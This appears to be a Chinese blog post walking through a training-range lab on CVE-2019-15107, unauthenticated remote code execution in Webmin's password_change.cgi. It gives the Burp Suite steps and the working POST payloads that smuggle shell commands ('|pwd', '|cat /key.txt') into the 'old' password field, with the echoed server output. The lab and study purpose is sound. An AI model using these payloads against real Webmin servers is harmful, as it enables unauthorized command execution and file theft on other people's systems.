墨者学院—Webmin未经身份验证的远程代码执行（简单复习）

背景描述：

Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计，互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后，攻击者可以通过发送POST请求在目标系统中执行任意命令，且无需身份验证。

漏洞介绍（cve-2019-15107）

1.漏洞编号： cve-2019-15107
2.漏洞描述： 该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码，该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞，该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码
3.影响版本： Webmin<=1.920

靶场实操

启动靶场后，进入靶场界面，注意title为login，后面会因为这个做改动

抓包修改

打开burp suite，开启代理，点击Sign in按钮

把所抓到的数据报发送到Repeater模块，进行数据修改，发送

在这里我们能看到，页面数据显示为**/session_login.cgi**，而漏洞复现资料里是**/password_change.cgi**，所以在这里要进行修改，对提交的**user=&pass=**进行修改，利用百度漏洞资料中的poc进行模仿构造自己的语句

user=qwe&pam=1&expired=2&old=laji|pwd&new1=laji&new2=laji

响应报

在修改好所有点之后，点击go发送，查看回显数据

在这里我用的是pwd命令，回显内容为

<h3>Failed to change password : The current password is incorrect/usr/share/webmin/acl</h3>

给出了当前所在路径，说明成功执行，只需要改变命令就可以了

换命令拿key值

根据以往做墨者靶场的经验，尝试在根目录下找key.txt文件，在这里我用的是cat命令，能显示出文件中的内容

user=qwe&pam=1&expired=2&old=laji|cat /key.txt&new1=laji&new2=laji

成功拿到key值

资料

多查询资料有帮助自己积累经验，以上仅是辣鸡的我个人观点，还请多多指教。

1. https://xz.aliyun.com/t/6040（阿里云资料）
2. http://blog.topsec.com.cn/webmin%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%EF%BC%88cve-2019-15107%EF%BC%89%E6%B7%B1%E5%85%A5%E5%88%86%E6%9E%90/（天融信）

墨者学院—Webmin未经身份验证的远程代码执行（简单复习）相关推荐

1. Webmin未经身份验证的远程代码执行

   [墨者学院]--Webmin未经身份验证的远程代码执行 做题前看看大佬写的漏洞原理:[https://blog.csdn.net/qq_43380549/article/details/1000112 ...

2. Webmin未经身份验证的远程代码执行-墨者学院

   01 背景介绍 Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作.据统计,互联网上大约有13w台机器使用Webmin. ...

3. 思科NGA设备中发现的高严重性漏洞，漏洞可导致未经身份验证即可远程攻击设备

   "Cisco NetFlow Generation Appliance(NGA)的流控制传输协议(SCTP)解码器中的漏洞可能允许未经身份验证的远程攻击者导致设备挂起或意外重新加载,从而导致 ...

4. 因为你组织的安全策略阻止未经身份验证的来宾（试了很多种办法都不行）

   最近在远程访问文件夹的时候出现了这个问题:因为安全策略阻止未经身份验证的来宾访问,类似这样的问题我们该如何解决呢, HKLM\SYSTEM\CurrentControlSet\Services\Lan ...

5. 你组织的安全策略阻止未经身份验证的来宾访问_你不能访问此共享文件夹，因为你组织的安全策略阻止未经身份验证来宾访问。...

   一.现象描述 今天去给客户安装系统,安装的是windows10操作系统,使用的是administrator登录帐户,安装完系统后,访问客户的共享电脑,发现无法访问,但是其它电脑都可以正常访问,而且也都 ...

6. 【转】你不能访问此共享文件夹，因为你组织的安全策略阻止未经身份验证的来宾访问

   电脑出现"你不能访问此共享文件夹,因为你组织的安全策略阻止未经身份验证的来宾访问."的原因是系统错误导致的,具体解决两个方案 一.修改Lanman WorkStation 1.首先 ...

7. 谷歌邮箱服务器验证失败,Gmail错误：SMTP服务器需要安全连接，或者客户端未经身份验证。服务器响应为...

   Gmail错误:SMTP服务器需要安全连接,或者客户端未经身份验证.服务器响应为 我使用以下代码发送电子邮件.代码在我的本地机器中正确工作.但是在生产服务器上,我得到了错误消息.var fromAdd ...

8. 电脑出现“你不能访问此共享文件夹，因为你组织的安全策略阻止未经身份验证的来宾访问。”怎么办？

   你不能访问此共享文件夹,因为你组织的安全策略阻止未经身份验证的来宾访问 此问题在win10出现多次,以前需要修改Win10 网络策略 按window+R键输入gpedit.msc 来启动本地组策略编辑 ...

9. 你不能访问此共享文件夹，因为你组织的安全策略阻止未经身份验证的来宾访问（连接共享打印机）

   一.问题描述(win10): 你不能访问此共享文件夹,因为你组织的安全策略阻止未经身份验证的来宾访问. 二.解决问题步骤: 1.运行(win+r),输入"gpedit.msc"启动 ...

最新文章

1. Go 知识点（14） — Go 多协程（单个协程触发panic会导致其它所有协程挂掉，每个协程只能捕获到自己的 panic 不能捕获其它协程）
2. C# 学习笔记（19）操作SQL Server下
3. 双色球随机选号器界面设计及功能实现
4. SQL注入是什么？如何防止？
5. [共享]一个文件上传的控件，绝对是精品源码
6. linux c 指针数组定义数组长度,C/C++指针数组和 迪士尼源码搭建下载 数组指针...
7. 7-3 逆序的三位数 (10 分)
8. 搭配对比学习，万能的 prompt 还能做可控文本生成
9. python运维开发培训_运维架构师-Python 自动化运维开发-014
10. 智行火车票能否把用户的敏感信息屏蔽？
11. 蓝桥杯 ALGO-1 算法训练 区间k大数查询
12. windows系统搭建redis集群
13. MATLAB常见语法错误
14. css文章排版代码,css文章排版
15. VIN码/车架号的详解，车架号识别，VIN码识别，OCR车架号识别能带来什么
16. 图床及管理工具PicGo
17. 知识付费网站源码可开分站一键更新后台数据
18. 触摸屏和显示屏参考文献
19. MEM/MBA 写作-论证有效性分析（09）逻辑缺陷-误用百分数滑坡谬误
20. 离散数学第二版计算机系,离散数学 第2版

热门文章

1. 惯性动作捕捉系统在虚拟主播中的应用
2. [Swift]LeetCode1031. 两个非重叠子数组的最大和 | Maximum Sum of Two Non-Overlapping Subarrays...
3. CorelCAD 2019.5 v19.1.1.2035破解版下载【Win+Mac+注册机】
4. VSCode悬停提示
5. 14.3 inline、const、mutable、this与static
6. 2022-2027年中国闪速存储器集成电路行业市场深度分析及发展战略规划报告
7. 手机查看html代码工具栏,【Meta标签】实现wap网页去掉手机浏览器默认工具栏
8. 10代cpu能装服务器系统不,第10代CPU可以装Windows7吗
9. 关于partnerLinkType的相关实验
10. matlab中有没有谱聚类,matlab – 谱聚类